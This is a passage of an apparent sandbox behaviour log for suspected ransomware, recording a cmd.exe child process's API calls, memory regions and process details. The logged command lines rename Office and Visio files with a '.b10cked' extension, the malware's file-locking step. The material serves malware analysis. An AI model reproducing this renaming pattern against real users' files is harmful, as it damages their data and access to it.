lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.266] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.267] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.267] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.267] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.267] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.267] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.267] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.267] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.270] GetConsoleTitleW (in: lpConsoleTitle=0x18f8d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.270] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.270] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.270] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.270] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.270] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.270] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.270] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.270] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.270] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.270] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.270] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.270] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.270] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.270] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.270] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.270] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.270] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.270] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.270] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.270] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.270] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.270] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.271] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.271] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.271] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.271] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.271] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.271] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.271] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.271] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.271] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.271] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.271] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.271] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.271] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.272] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.272] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.272] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f694, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f68c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f68c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.272] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.272] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.273] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.274] _wcsicmp (_String1="MSE1C9~1.HXN", _String2=".") returned 63 [0202.274] _wcsicmp (_String1="MSE1C9~1.HXN", _String2="..") returned 63 [0202.274] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mse1c9~1.hxn")) returned 0x2022 [0202.274] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x201e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.274] SetErrorMode (uMode=0x0) returned 0x0 [0202.274] SetErrorMode (uMode=0x1) returned 0x0 [0202.274] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", nBufferLength=0x104, lpBuffer=0x18f01c, lpFilePart=0x18f004 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", lpFilePart=0x18f004*="MSE1C9~1.HXN") returned 0x27 [0202.274] SetErrorMode (uMode=0x0) returned 0x1 [0202.274] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.274] _wcsicmp (_String1="MSE1C9~1.HXN", _String2=".") returned 63 [0202.274] _wcsicmp (_String1="MSE1C9~1.HXN", _String2="..") returned 63 [0202.274] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mse1c9~1.hxn")) returned 0x2022 [0202.274] SetErrorMode (uMode=0x0) returned 0x0 [0202.274] SetErrorMode (uMode=0x1) returned 0x0 [0202.274] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", nBufferLength=0x104, lpBuffer=0x18f498, lpFilePart=0x18f230 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", lpFilePart=0x18f230*="MSE1C9~1.HXN") returned 0x27 [0202.274] SetErrorMode (uMode=0x0) returned 0x1 [0202.275] SetErrorMode (uMode=0x0) returned 0x0 [0202.275] SetErrorMode (uMode=0x1) returned 0x0 [0202.275] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x18f6a0, lpFilePart=0x18f230 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked", lpFilePart=0x18f230*="MS.VISIO_PRM.14.1033.hxn.b10cked") returned 0x3b [0202.275] SetErrorMode (uMode=0x0) returned 0x1 [0202.275] SetLastError (dwErrCode=0x0) [0202.275] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.visio_prm.14.1033.hxn.b10cked")) returned 0xffffffff [0202.275] GetLastError () returned 0x2 [0202.275] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x18ebac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebac) returned 0x1f0e88 [0202.275] FindNextFileW (in: hFindFile=0x1f0e88, lpFindFileData=0x18ebac | out: lpFindFileData=0x18ebac) returned 0 [0202.275] FindClose (in: hFindFile=0x1f0e88 | out: hFindFile=0x1f0e88) returned 1 [0202.276] GetLastError () returned 0x12 [0202.276] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x18ebac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebac) returned 0x1f0e88 [0202.276] FindNextFileW (in: hFindFile=0x1f0e88, lpFindFileData=0x18ebac | out: lpFindFileData=0x18ebac) returned 0 [0202.276] FindClose (in: hFindFile=0x1f0e88 | out: hFindFile=0x1f0e88) returned 1 [0202.276] GetLastError () returned 0x12 [0202.276] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x201bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x201bf0) returned 0x1f0e88 [0202.277] FindNextFileW (in: hFindFile=0x1f0e88, lpFindFileData=0x201bf0 | out: lpFindFileData=0x201bf0) returned 0 [0202.277] FindClose (in: hFindFile=0x1f0e88 | out: hFindFile=0x1f0e88) returned 1 [0202.277] GetLastError () returned 0x12 [0202.277] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x201bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x201bf0) returned 0x1f0e88 [0202.277] FindNextFileW (in: hFindFile=0x1f0e88, lpFindFileData=0x201bf0 | out: lpFindFileData=0x201bf0) returned 0 [0202.277] FindClose (in: hFindFile=0x1f0e88 | out: hFindFile=0x1f0e88) returned 1 [0202.277] GetLastError () returned 0x12 [0202.277] _get_osfhandle (_FileHandle=2) returned 0xb [0202.277] GetFileType (hFile=0xb) returned 0x2 [0202.585] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.585] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18ed7c | out: lpMode=0x18ed7c) returned 1 [0202.585] _get_osfhandle (_FileHandle=2) returned 0xb [0202.585] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18edb0 | out: lpConsoleScreenBufferInfo=0x18edb0) returned 1 [0202.585] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.586] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18edf0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.586] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x18edd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18edd4*=0x2c) returned 1 [0202.586] longjmp () [0202.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.586] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.587] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.587] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.587] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.587] SetConsoleInputExeNameW () returned 0x1 [0202.587] GetConsoleOutputCP () returned 0x1b5 [0202.587] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.587] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.587] exit (_Code=1) Process: id = "481" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16cc0" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29420 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29421 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29422 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29423 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 29424 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29425 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29426 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29427 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29428 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29429 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30316 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30317 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30318 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30319 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 30320 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 30321 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30322 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30323 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30324 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30325 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30326 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30327 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30328 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30329 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30330 start_va = 0x450000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 30331 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30332 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30333 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30334 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 30335 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 30336 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30337 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 30338 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 30339 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 30340 start_va = 0x13a0000 end_va = 0x145ffff entry_point = 0x13a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 678 os_tid = 0xdb8 [0205.380] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f8ec | out: lpSystemTimeAsFileTime=0x22f8ec*(dwLowDateTime=0xaf393680, dwHighDateTime=0x1d440a9)) [0205.380] GetCurrentProcessId () returned 0x92c [0205.380] GetCurrentThreadId () returned 0xdb8 [0205.380] GetTickCount () returned 0x39d95 [0205.380] QueryPerformanceCounter (in: lpPerformanceCount=0x22f8e4 | out: lpPerformanceCount=0x22f8e4*=26216961935) returned 1 [0205.381] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0205.381] __set_app_type (_Type=0x1) [0205.381] __p__fmode () returned 0x76b331f4 [0205.381] __p__commode () returned 0x76b331fc [0205.381] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0205.381] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0205.381] GetCurrentThreadId () returned 0xdb8 [0205.381] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdb8) returned 0x38 [0205.381] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.382] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0205.382] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.382] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.382] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f87c | out: phkResult=0x22f87c*=0x0) returned 0x2 [0205.382] VirtualQuery (in: lpAddress=0x22f8b3, lpBuffer=0x22f84c, dwLength=0x1c | out: lpBuffer=0x22f84c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.382] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f84c, dwLength=0x1c | out: lpBuffer=0x22f84c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0205.382] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f84c, dwLength=0x1c | out: lpBuffer=0x22f84c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0205.382] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f84c, dwLength=0x1c | out: lpBuffer=0x22f84c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.382] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f84c, dwLength=0x1c | out: lpBuffer=0x22f84c*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0205.382] GetConsoleOutputCP () returned 0x1b5 [0205.382] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.382] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0205.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.382] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0205.382] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.382] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.383] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.383] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.383] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.383] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.383] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0205.383] GetEnvironmentStringsW () returned 0x360190* [0205.383] FreeEnvironmentStringsW (penv=0x360190) returned 1 [0205.383] GetEnvironmentStringsW () returned 0x360190* [0205.384] FreeEnvironmentStringsW (penv=0x360190) returned 1 [0205.384] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e7ec | out: phkResult=0x22e7ec*=0x40) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0xb8, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x1, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0x1, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x0, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x40, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x40, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0x40, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegCloseKey (hKey=0x40) returned 0x0 [0205.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e7ec | out: phkResult=0x22e7ec*=0x40) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 